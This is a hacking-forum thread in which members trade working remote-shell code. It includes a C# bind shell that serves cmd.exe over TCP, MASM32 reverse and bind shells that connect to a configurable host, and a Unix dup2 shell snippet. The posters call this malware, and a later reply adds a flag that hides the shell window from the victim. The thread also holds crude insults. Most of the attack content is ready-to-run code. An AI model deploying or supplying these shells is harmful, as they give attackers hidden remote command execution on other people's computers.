Author Topic: [Bubzuru C#] Tiny Shell  (Read 7148 times)

0 Members and 1 Guest are viewing this topic.

Offline bubzuru

  • Knight
  • **
  • Posts: 395
  • Cookies: 21
  • everything is contained in the data
    • View Profile
    • New School Tools
[Bubzuru C#] Tiny Shell
« on: November 08, 2011, 03:40:04 pm »
a very simple remote shell, well commented.
this is why i love the .net framework

compiled size = 6kb :)

Code: [Select]
//////////////////////////////////
/////////// Tiny Shell ///////////
//////////  By Bubzuru ///////////
//////////////////////////////////
using System;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Diagnostics;

class TinyShell
{
    public static NetworkStream stream; //keep this public so we can access it from our event handler

    public static void Main()
    {
        try
        {
            //Create our TcpListener on port 23
            IPAddress localAddr = IPAddress.Parse("127.0.0.1");
            TcpListener server = new TcpListener(localAddr, 23);

            // Start listening for client requests.
            server.Start();

            // Buffer for reading data
            Byte[] bytes = new Byte[256];
            String data = null;

            // Enter the listening loop.
            while (true)
            {
                //perform a blocking call to accept requests.
                TcpClient client = server.AcceptTcpClient();
               
                //client connected , lets do our shit
                data = null;

                //CreateProcess cmd.exe with redirected stdin, stdout, stderror
                Process CmdProc;
                CmdProc = new Process();
               
                CmdProc.StartInfo.FileName = "cmd";
                CmdProc.StartInfo.UseShellExecute = false;
                CmdProc.StartInfo.RedirectStandardInput = true;
                CmdProc.StartInfo.RedirectStandardOutput = true;
                CmdProc.StartInfo.RedirectStandardError = true;
               
                CmdProc.OutputDataReceived += new DataReceivedEventHandler(SortOutputHandler);
                CmdProc.ErrorDataReceived += new DataReceivedEventHandler(SortOutputHandler);
             
   
                //start cmd.exe and begin waiting for output
                CmdProc.Start();
                CmdProc.BeginOutputReadLine();
                CmdProc.BeginErrorReadLine();

                //stream writer to send data to cmd.exe
                StreamWriter sortStreamWriter = CmdProc.StandardInput;
                //set network stream object for reading and writing to\from client
                stream = client.GetStream();

                int i;             
                // Loop to receive all the data sent by the client.
                while ((i = stream.Read(bytes, 0, bytes.Length)) != 0)
                {
                    // Translate data bytes to a ASCII string.
                    data = System.Text.Encoding.ASCII.GetString(bytes, 0, i);
                    // send data string (info sent by client) to command prompt
                    sortStreamWriter.WriteLine(data.Trim());
                }

                // Shutdown and end connection
                client.Close();
            }
        }
        catch (SocketException e)
        {
            Console.WriteLine("SocketException: {0}", e);
        }

    }

    //This handler will fire everytime our CmdProc writes to stdout,stderror
    public static void SortOutputHandler(object sendingProcess, DataReceivedEventArgs outLine)
    {
        string[] SplitData = outLine.Data.Split('\n');
        foreach (string s in SplitData)
        {
             byte[] msg = System.Text.Encoding.ASCII.GetBytes(s + "\r\n");
             stream.Write(msg, 0, msg.Length);     
        }
    }

}

« Last Edit: November 08, 2011, 03:43:59 pm by bubzuru »
Damm it feels good to be gangsta
http://bubzuru.comule.com

Offline FuyuKitsune

  • Knight
  • **
  • Posts: 292
  • Cookies: 21
    • View Profile
Re: [Bubzuru C#] Tiny Shell
« Reply #1 on: November 08, 2011, 04:21:19 pm »
Wow that really frigging simple. Go OOP.

Offline bubzuru

  • Knight
  • **
  • Posts: 395
  • Cookies: 21
  • everything is contained in the data
    • View Profile
    • New School Tools
Re: [Bubzuru C#] Tiny Shell
« Reply #2 on: November 08, 2011, 04:25:44 pm »
yes go OOP

and the way i see it
most malware is writen for windows, and in the near future
all windows computers will have the .net framework installed.

so we might aswell start using it now :)
Damm it feels good to be gangsta
http://bubzuru.comule.com

Offline xzid

  • Knight
  • **
  • Posts: 329
  • Cookies: 41
    • View Profile
Re: [Bubzuru C#] Tiny Shell
« Reply #3 on: November 08, 2011, 11:53:18 pm »
MASM32 reverse shell. Exactly 2kB when stripped. :P

Code: [Select]
.686
include \masm32\include\masm32rt.inc
include \masm32\include\ws2_32.inc

includelib \masm32\lib\ws2_32.lib

; 127.0.0.1:1111
RHOST    equ    0100007fh
RPORT    equ    5704h

.data
cmd    BYTE "cmd",0

.data?
WSAd    WSADATA<>
sin    sockaddr_in<>
sinfo    STARTUPINFO<>
pinfo    PROCESS_INFORMATION<>

.code
start:
    mov sin.sin_family, AF_INET
    mov sin.sin_port, RPORT
    mov sin.sin_addr, RHOST
    mov sinfo.cb, sizeof STARTUPINFO
    mov sinfo.dwFlags, 100h
    invoke WSAStartup, 257, ADDR WSAd
    invoke WSASocket, AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0
    mov edi, eax
    invoke connect, edi, addr sin, sizeof sockaddr_in
    mov sinfo.hStdInput, edi
    mov sinfo.hStdOutput, edi
    mov sinfo.hStdError, edi
    invoke CreateProcess, NULL, addr cmd, NULL, NULL, TRUE, 0, NULL, NULL, addr sinfo, addr pinfo
    invoke ExitProcess, 0
end start


Offline bubzuru

  • Knight
  • **
  • Posts: 395
  • Cookies: 21
  • everything is contained in the data
    • View Profile
    • New School Tools
Re: [Bubzuru C#] Tiny Shell
« Reply #4 on: November 09, 2011, 05:41:08 pm »
MASM32 reverse shell. Exactly 2kB when stripped. :P

Code: [Select]
.686
include \masm32\include\masm32rt.inc
include \masm32\include\ws2_32.inc

includelib \masm32\lib\ws2_32.lib

; 127.0.0.1:1111
RHOST    equ    0100007fh
RPORT    equ    5704h

.data
cmd    BYTE "cmd",0

.data?
WSAd    WSADATA<>
sin    sockaddr_in<>
sinfo    STARTUPINFO<>
pinfo    PROCESS_INFORMATION<>

.code
start:
    mov sin.sin_family, AF_INET
    mov sin.sin_port, RPORT
    mov sin.sin_addr, RHOST
    mov sinfo.cb, sizeof STARTUPINFO
    mov sinfo.dwFlags, 100h
    invoke WSAStartup, 257, ADDR WSAd
    invoke WSASocket, AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0
    mov edi, eax
    invoke connect, edi, addr sin, sizeof sockaddr_in
    mov sinfo.hStdInput, edi
    mov sinfo.hStdOutput, edi
    mov sinfo.hStdError, edi
    invoke CreateProcess, NULL, addr cmd, NULL, NULL, TRUE, 0, NULL, NULL, addr sinfo, addr pinfo
    invoke ExitProcess, 0
end start



i have to admit thats sexy , how does it work ?
when i read it , i think i get it but then i think a bit more and i get confused

what part of the code send the stdout to the socket ?
and how is the socket received info , sent into std in ?

any chance of comments ? also is it easier to make a reverse shell than a stander "listener" shell
Damm it feels good to be gangsta
http://bubzuru.comule.com

Offline xzid

  • Knight
  • **
  • Posts: 329
  • Cookies: 41
    • View Profile
Re: [Bubzuru C#] Tiny Shell
« Reply #5 on: November 09, 2011, 08:54:24 pm »
I think the best way to describe it would be in C, redirecting output to a file using CreateProcess(follow the comments):

Code: [Select]
#include <windows.h>

int main(void)
    {
    HANDLE hFile;
    STARTUPINFO sinfo;
    PROCESS_INFORMATION pinfo;
    SECURITY_ATTRIBUTES  sa;

    // required for our file
    memset(&sa, 0, sizeof(sa));
    sa.bInheritHandle = TRUE;

    // Create our file, return HANDLE
    hFile = CreateFile(
        "out.txt",
        GENERIC_WRITE,
        FILE_SHARE_WRITE,
        &sa,
        OPEN_ALWAYS,
        FILE_ATTRIBUTE_NORMAL,
        NULL);

    // fill the process STARTUPINFO with our handles
    memset(&sinfo, 0, sizeof(sinfo));
    sinfo.cb = sizeof(sinfo);
    sinfo.dwFlags = STARTF_USESTDHANDLES;

    // the important part:
    sinfo.hStdOutput = hFile;
    sinfo.hStdError = hFile;

    // now a new process, with output to hFile
    CreateProcess(
        NULL,
        "cmd.exe /C echo.hello world",
        NULL,
        NULL,
        TRUE,
        0,
        NULL,
        NULL,
        &sinfo,
        &pinfo);

    // cleanup
    return 0;
    }

After you run, you should see a file "out.txt" containing "hello world". Basically what I did with the socket.

About the bind shell, it's not much harder in C. It's the difference between "connect" & "bind; listen; loop{accept;}"..

This should work for both. Also added a macro "runshell", which should show you the "shell" part of it:

Code: [Select]
.686
include \masm32\include\masm32rt.inc
include \masm32\include\ws2_32.inc

includelib \masm32\lib\ws2_32.lib

; 127.0.0.1:1111
RHOST    equ    0100007fh
RPORT    equ    5704h

; uncomment for bind shell
;LPORT    equ    5704h

.data
cmd    byte    "cmd",0

.data?
WSAd    WSADATA<>
sin    sockaddr_in<>
sinfo    STARTUPINFO<>
pinfo    PROCESS_INFORMATION<>

.code
runshell macro sock
    mov sinfo.hStdInput, sock
    mov sinfo.hStdOutput, sock
    mov sinfo.hStdError, sock
    invoke CreateProcess, NULL, addr cmd, NULL, NULL, TRUE, 0, NULL, NULL, addr sinfo, addr pinfo
endm

start:
    mov sinfo.cb, sizeof STARTUPINFO
    mov sinfo.dwFlags, 100h
    invoke WSAStartup, 257, addr WSAd
    invoke WSASocket, AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0
    mov edi, eax
    mov sin.sin_family, AF_INET
ifdef    LPORT
    mov sin.sin_port, LPORT
    mov sin.sin_addr, 0
    invoke bind, edi, addr sin, sizeof sockaddr_in
    invoke listen, edi, 1
@@loop:
    invoke WSAAccept, edi, NULL, 0, NULL, NULL
    runshell eax
    jmp @@loop
else
    mov sin.sin_port, RPORT
    mov sin.sin_addr, RHOST
    invoke connect, edi, addr sin, sizeof sockaddr_in
    runshell edi
endif
    invoke ExitProcess, 0
end start

Once again 2kB when stripped. MASM is pretty easy to code when using WinAPI.

It might also be easier to visualize it's UNIX counterpart:
Code: [Select]
// connect()/accept() socket
dup2(sock_fd, fileno(stdin));
dup2(sock_fd, fileno(stdout));
dup2(sock_fd, fileno(stderr));
// or just:
// for(i = 0; i <= 2; i++) dup2(sock_fd, i);
/*
At this point the socket(remote netcat client/server) controls our stdin, stdout, stderr.
So to have a remote shell we simply need to:
*/
system("bash");

Offline bubzuru

  • Knight
  • **
  • Posts: 395
  • Cookies: 21
  • everything is contained in the data
    • View Profile
    • New School Tools
Re: [Bubzuru C#] Tiny Shell
« Reply #6 on: November 09, 2011, 09:18:39 pm »
nice

so we just set the stdin,stdout on our startinfo to the socket handle instead of the file handle ?

but what about stdin ? i had to loop as i got the info from the socket then use a stream to send it to stdin, seems trivial what am i missing ?
Damm it feels good to be gangsta
http://bubzuru.comule.com

Offline bubzuru

  • Knight
  • **
  • Posts: 395
  • Cookies: 21
  • everything is contained in the data
    • View Profile
    • New School Tools
Re: [Bubzuru C#] Tiny Shell
« Reply #7 on: November 09, 2011, 09:30:01 pm »
just been reading more about this

Quote
It is also common practice on Windows NT to set the standard handles (standard input, output, or error) of the child process to the socket handle. In such cases, the child process usually does not know that its standard handles are actually sockets.

here is the link for anyone who's intrested
http://support.microsoft.com/kb/150523
Damm it feels good to be gangsta
http://bubzuru.comule.com

Offline xzid

  • Knight
  • **
  • Posts: 329
  • Cookies: 41
    • View Profile
Re: [Bubzuru C#] Tiny Shell
« Reply #8 on: November 09, 2011, 09:35:03 pm »
I've never worked with the Process Class. Although from a few google searches, I'd guess your doing it right(Although have no clue).

http://www.techpowerup.com/forums/showthread.php?t=62350

You could probably achieve the C method through C#, something along the lines of:

http://blogs.msdn.com/b/thottams/archive/2006/08/11/696013.aspx

You'd probably have to do the same to ws2_32(winsock2).

Offline bubzuru

  • Knight
  • **
  • Posts: 395
  • Cookies: 21
  • everything is contained in the data
    • View Profile
    • New School Tools
Re: [Bubzuru C#] Tiny Shell
« Reply #9 on: November 09, 2011, 10:43:15 pm »
I've never worked with the Process Class. Although from a few google searches, I'd guess your doing it right(Although have no clue).

http://www.techpowerup.com/forums/showthread.php?t=62350

You could probably achieve the C method through C#, something along the lines of:

http://blogs.msdn.com/b/thottams/archive/2006/08/11/696013.aspx

You'd probably have to do the same to ws2_32(winsock2).

well in Process class, Process() is just a wrapper for CreateProcess is has the startinfo structures etc so sending the stdin,out,error to the socket can be done i just didn't know when i made that shell.

thanx for the info, gunna make a reverse shell now and try it out
« Last Edit: November 09, 2011, 10:44:49 pm by bubzuru »
Damm it feels good to be gangsta
http://bubzuru.comule.com

Offline bubzuru

  • Knight
  • **
  • Posts: 395
  • Cookies: 21
  • everything is contained in the data
    • View Profile
    • New School Tools
Re: [Bubzuru C#] Tiny Shell
« Reply #10 on: November 11, 2011, 01:03:34 am »
well i just tryd to set stdout to a socket handle, guess what happened ?

Quote
Cannot implicitly convert type 'System.IntPtr' to 'System.IO.StreamReader'
Property or indexer 'System.Diagnostics.Process.StandardError' cannot be assigned to -- it is read only   
 

guess its not just the same , would have to pinvoke the real CreateProcess ,,, fuck it gunna code this in delphi for fun , not coded it for a while
Damm it feels good to be gangsta
http://bubzuru.comule.com

Offline swankvx

  • NULL
  • Posts: 1
  • Cookies: -1
    • View Profile
Re: [Bubzuru C#] Tiny Shell
« Reply #11 on: September 03, 2015, 04:38:25 pm »
Why do not hide the window?

use:

invoke CreateProcess, NULL, addr cmd, NULL, NULL, true, 8000040h, NULL, ....

instead:

invoke CreateProcess, NULL, addr cmd, NULL, NULL, true, 0, NULL, ....

The shell window will not appear..
« Last Edit: September 03, 2015, 04:40:55 pm by swankvx »

Offline DarkScript

  • NULL
  • Posts: 4
  • Cookies: -6
    • View Profile
Re: [Bubzuru C#] Tiny Shell
« Reply #12 on: September 29, 2015, 02:48:16 am »
Avoid port 23 if you can. 23 requires admin rights so using a port above 4000 i believe on windows is allowed for anyuser. unless you're running linux in which case all ports are blocked usually (I know this code isnt for linux #CMD but its always useful to know your sudo).

Offline chris

  • EZ's GOD
  • VIP
  • Knight
  • *
  • Posts: 197
  • Cookies: 37
  • What should I put here :(
    • View Profile
Re: [Bubzuru C#] Tiny Shell
« Reply #13 on: September 29, 2015, 07:54:03 am »
Avoid port 23 if you can. 23 requires admin rights so using a port above 4000 i believe on windows is allowed for anyuser. unless you're running linux in which case all ports are blocked usually (I know this code isnt for linux #CMD but its always useful to know your sudo).

Great post faggot.... I'm sure this helped the user who posted this BACK IN FUCKING 2011!!!!!
<chris1> give me a idea of a img to use for a avatar
<HTH> A cock